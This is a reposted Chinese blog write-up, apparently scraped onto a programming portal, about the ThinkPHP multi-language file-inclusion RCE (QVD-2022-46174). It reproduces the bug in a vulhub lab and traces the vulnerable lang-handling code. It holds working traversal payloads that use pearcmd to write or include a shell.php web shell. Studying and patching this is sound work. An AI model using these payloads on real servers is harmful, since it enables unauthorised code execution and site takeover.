我的编程空间,编程开发者的网络收藏夹
学习永远不晚
位置:首页-资讯-后端开发

Thinkphp QVD-2022-46174 多语言rce

2023-09-08 18:08

短信预约 -IT技能 免费直播动态提醒
省份

北京

  • 北京
  • 上海
  • 天津
  • 重庆
  • 河北
  • 山东
  • 辽宁
  • 黑龙江
  • 吉林
  • 甘肃
  • 青海
  • 河南
  • 江苏
  • 湖北
  • 湖南
  • 江西
  • 浙江
  • 广东
  • 云南
  • 福建
  • 海南
  • 山西
  • 四川
  • 陕西
  • 贵州
  • 安徽
  • 广西
  • 内蒙
  • 西藏
  • 新疆
  • 宁夏
  • 兵团
手机号
获取短信验证
立即预约

请填写图片验证码后获取短信验证码

看不清楚,换张图片

免费获取短信验证码

Thinkphp QVD-2022-46174 多语言rce

文章目录

漏洞介绍

Thinkphp,v6.0.1~v6.0.13,v5.0.x,v5.1.x

如果 Thinkphp 程序开启了多语言功能,那就可以通过 get、header、cookie 等位置传入参数,实现目录穿越+文件包含,通过 pearcmd 文件包含这个 trick 即可实现 RCE。

文件包含漏洞存在的情况下还需要服务器满足下面两个条件才能利用:

  1. PHP环境开启了register_argc_argv
  2. PHP环境安装了pcel/pear

Docker默认的PHP环境恰好满足上述条件。所以先使用vulhub进行漏洞利用的复现

vulhub漏洞搭建

cd vulhub/thinkphp/lang-rce编译环境docker-compose build运行环境docker-compose up -d

访问 ip:8080

image-20230116155721851

漏洞利用

测试包含public/index.php文件来确认文件包含漏洞是否存在

?lang=../../../../../public/index

如果漏洞存在,则服务器会出错,返回500页面

image-20230116160441349

利用一:写入文件

利用pearcmd写入shell文件

?+config-create+/&lang=../../../../../../../../../../../usr/local/lib/php/pearcmd&/+shell.php

image-20230116160912793

如果服务器返回pearcmd的命令行执行结果,说明漏洞利用成功

此时访问url/shell.php即可发现已经成功写入文件

image-20230116161039030

利用二:文件包含

使用pearcmd在/tmp文件夹下创建文件再进行包含,P神文章

?lang=../../../../../../../usr/local/lib/php/pearcmd&+config-create+/&/+/tmp/shell.php

image-20230116164435443

?lang=../../../../../../../tmp/shell

image-20230116164451808

2023 realword ctf体验赛 中出现了这个利用方法

漏洞分析

TP6在路径app/middleware.php 开启多语言特性

image-20230116144503740

image-20230116144354708

测试漏洞成功

thinkphp程序初始化都会运行class="lazy" data-src/think/App.php里的initialize()方法

image-20230116174457963

函数中使用this->loadLangPack()获取语言包,跟进loadLangPack()方法

image-20230116175150102

却发现只有加载默认语言包的功能,换一条路

访问

?lang=../../../../../public/index

class="lazy" data-src/think/middleware/LoadLangPack.php 查看LoadLangPack.php

image-20230116175624231

在 middleware 的 handle() 函数会被调用,这里断在 LoadLangPack.phphandle()

跟进detect()方法

image-20230116175925115

可以看到依次排查了 GET["lang"]HEADER["think-lang"]COOKIE["think_lang"] ,并且将其不做任何过滤,直接赋值给了 $langSet

继续走下去

此时payload被赋值给为参数$langSet。回到loadLangPack函数,下一步执行

$this->request->setLangset($this->lang->range() ) 调用setLangset()

image-20230116203244436 image-20230116203256382

如果返回的 $langset 不等于默认的 langset

那么就会调用 $this->lang->switchLangSet($langset) ,正是在这里面实现了 文件包含

image-20230118114249426

跟进 switchLangSet() ,可以看到调用了 $this->load() ,而传入的参数直接拼接而成文件的路径

image-20230118120954457

继续跟进这个load()

image-20230118121256510

判断文件是否存在,把文件路径又调用给了parse(),跟进parse()

image-20230118121509577

可以看到进行了include文件包含, 造成文件包含漏洞

可以通过目录穿越实现任意 php 文件的包含,那么用 pearcmd 文件包含这个 trick ,就能 RCE 了

参考文章

https://xz.aliyun.com/t/11940

https://www.leavesongs.com/PENETRATION/docker-php-include-getshell.html

https://tttang.com/archive/1865/#toc_thinkphp-6

https://github.com/vulhub/vulhub/blob/master/thinkphp/lang-rce/README.zh-cn.md

来源地址:https://blog.csdn.net/qq_61768489/article/details/128729352

免责声明:

① 本站未注明“稿件来源”的信息均来自网络整理。其文字、图片和音视频稿件的所属权归原作者所有。本站收集整理出于非商业性的教育和科研之目的,并不意味着本站赞同其观点或证实其内容的真实性。仅作为临时的测试数据,供内部测试之用。本站并未授权任何人以任何方式主动获取本站任何信息。

② 本站未注明“稿件来源”的临时测试数据将在测试完成后最终做删除处理。有问题或投稿请发送至: 邮箱/279061341@qq.com QQ/279061341

服务器安全php
阅读原文内容投诉

Thinkphp QVD-2022-46174 多语言rce

下载Word文档到电脑,方便收藏和打印~

下载Word文档

相关文章

猜你喜欢

Thinkphp QVD-2022-46174 多语言rce

2023-09-08

ThinkPHP多语言文件包含RCE(QVD-2022-46174)

2023-09-22

ThinkPHP Lang多语言本地文件包含漏洞(QVD-2022-46174)漏洞复现

2023-08-31

ThinkPHP 多语言模块RCE漏洞复现

2023-09-02

ThinkPHP多语言模块文件包含RCE复现详细教程

2023-10-18

Thinkphp 6.0多语言

2023-09-24

Thinkphp多语言最佳解决方案

2023-08-31

【漏洞复现】CNVD-2022-86535-ThinkphpV6多语言

2023-09-02

2022下半年软件设计师知识点:多种程序语言特点

  不少考生在备考2022下半年软件设计师考试,编程学习网小编小编为大家整理了2022下半年软件设计师知识点:多种程序语言特点,希望对大家备考有帮助。  为帮助考生备考软考软件设计师考试,编程学习网小编小编为大家整理了2022下半年软件设计师知识点:多种程序语言特点,相信对大家备考会有帮助。  多种程序语言特点(★★★)  【
2022下半年软件设计师知识点:多种程序语言特点
2024-04-19

2022年软件设计师考试知识点(七十三):多种程序语言特点

  为帮助考生备考2022年软考中级软件设计师考试,编程学习网小编为大家整理了2022年软件设计师考试知识点(七十三):多种程序语言特点,希望对大家备考会有帮助。  很多考生在备考2022年软件设计师考试,编程学习网小编为大家整理了2022年软件设计师考试知识点(七十三):多种程序语言特点,供考生备考复习。  多种程序语言特点
2022年软件设计师考试知识点(七十三):多种程序语言特点
2024-04-19

春秋云镜 CVE-2022-30887 多语言药房管理系统 (MPMS) [超详细新手教程]

2023-10-04

热门标签

Linux(148)PHP(127)Java(102)正则表达式(101)JavaScript(69)最佳实践(67)jQuery(44)MySQL(39)Docker(37)C语言(36)性能优化(34)Python(34)XML(28)string(27)第三方库(23)回调函数(23)ZIP(22)数组(22)可扩展性(22)字符串比较(21)find(20)RPM(20)Go(20)grep(19)ASP.NETCore(19)XML解析器(19)事件(19)事件处理程序(19)StringBuilder(18)Nginx(18)

编程热搜

  • Python 学习之路 - Python
    一、安装Python34Windows在Python官网(https://www.python.org/downloads/)下载安装包并安装。Python的默认安装路径是:C:\Python34配置环境变量:【右键计算机】--》【属性】-
    Python 学习之路 - Python
  • chatgpt的中文全称是什么
    chatgpt的中文全称是生成型预训练变换模型。ChatGPT是什么ChatGPT是美国人工智能研究实验室OpenAI开发的一种全新聊天机器人模型,它能够通过学习和理解人类的语言来进行对话,还能根据聊天的上下文进行互动,并协助人类完成一系列
    chatgpt的中文全称是什么
  • C/C++中extern函数使用详解
    C/C++中extern函数使用详解
  • C/C++可变参数的使用
    可变参数的使用方法远远不止以下几种,不过在C,C++中使用可变参数时要小心,在使用printf()等函数时传入的参数个数一定不能比前面的格式化字符串中的’%’符号个数少,否则会产生访问越界,运气不好的话还会导致程序崩溃
    C/C++可变参数的使用
  • css样式文件该放在哪里
    css样式文件该放在哪里
  • php中数组下标必须是连续的吗
    php中数组下标必须是连续的吗
  • Python 3 教程
    Python 3 教程 Python 的 3.0 版本,常被称为 Python 3000,或简称 Py3k。相对于 Python 的早期版本,这是一个较大的升级。为了不带入过多的累赘,Python 3.0 在设计的时候没有考虑向下兼容。 Python
    Python 3 教程
  • Python pip包管理
    一、前言    在Python中, 安装第三方模块是通过 setuptools 这个工具完成的。 Python有两个封装了 setuptools的包管理工具: easy_install  和  pip , 目前官方推荐使用 pip。    
    Python pip包管理
  • ubuntu如何重新编译内核
    ubuntu如何重新编译内核
  • 改善Java代码之慎用java动态编译
    改善Java代码之慎用java动态编译
查看更多

编程资源站

  • 资料下载
  • 历年试题
2021年下半年软考高级信息系统项目管理师高频考点精选资料
2021下半年软考高级信息系统技术知识点记忆口诀精选资料
2021下半年软考《信息系统项目管理师》考试真题及答案精选资料
2021下半年软考高级考试备考攻略精选资料
2021年软考高级《信息系统项目管理师》巩固练习题汇总精选资料
2021下半年软考高级信息系统项目管理师30个易考知识点汇总精选资料
2021下半年软考高级知识点这样记,还担心记不住吗精选资料
2021年下半年软考高级考试重点汇总精选资料
2021下半年软考高级信息系统项目管理师计算公式汇总精选资料
2021年下半年软考高级《信息系统项目管理师》模拟试题精选资料
查看更多
信息系统项目管理师选择题每日一练(2024)历年试题
2023年下半年信息系统项目管理师综合知识真题演练历年试题
查看更多

目录

本网页已闲置超过3分钟,按键盘任意键或点击空白处,即可回到网页
最新资讯更多
    友情链接编程网

    反馈

    我要
    反馈